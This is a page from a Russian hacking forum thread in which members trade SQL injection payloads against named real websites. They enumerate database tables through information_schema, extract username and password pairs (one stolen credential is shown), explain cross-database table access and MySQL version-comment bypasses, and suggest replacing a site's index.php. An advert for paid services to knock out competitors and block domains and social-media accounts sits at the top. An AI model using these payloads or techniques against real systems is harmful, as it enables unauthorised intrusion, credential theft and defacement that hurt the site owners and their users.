Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 491 из 1393

491

Опции темы

Поиск в этой теме

Опции просмотра

#4901

22.01.2009, 23:08

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index

Последний раз редактировалось sabe; 22.01.2009 в 23:40..

#4902

22.01.2009, 23:49

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Код:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),database())--

Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет?

#4903

23.01.2009, 00:00

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

В каком плане "не пускает"?

Код:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--

#4904

23.01.2009, 00:01

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Цитата:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_schema,table_n ame)+from+information_schema.columns+where+column_ name+like+char(112,97,115,115)+limit+0,1--

например достаем таблу с пассами..

Цитата:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+adil soz.noc+limit+0,1--

осюда и вывод

slava;1234Slava1

#4905

23.01.2009, 00:03

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от R1dex

В каком плане "не пускает"?

Код:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--

у меня чето ошибку выдовала, хз почему, а эту таблицу ты как нарыл, через limit?

#4906

23.01.2009, 00:05

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"

#4907

23.01.2009, 00:17

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от R1dex

Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?

#4908

23.01.2009, 00:19

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Код:

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.tables+limit+45,1--

table_name - имя таблицы
table_schema - бд, в которой таблица

В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть:

from+froum.ibf_cal_events

Последний раз редактировалось R1dex; 23.01.2009 в 00:21..

#4909

23.01.2009, 00:36

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Вот еще,

Код:

http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2--

прекрассно видно что только два числа должны отображаться, а при вводе

Код:

http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2--

выдает ошибку, объясните плз, где я ошибся? Заранее благодарен!

#4910

23.01.2009, 00:42

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*

__________________
Появляюсь редко. Важные дела в реале.

Страница 491 из 1393

491

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход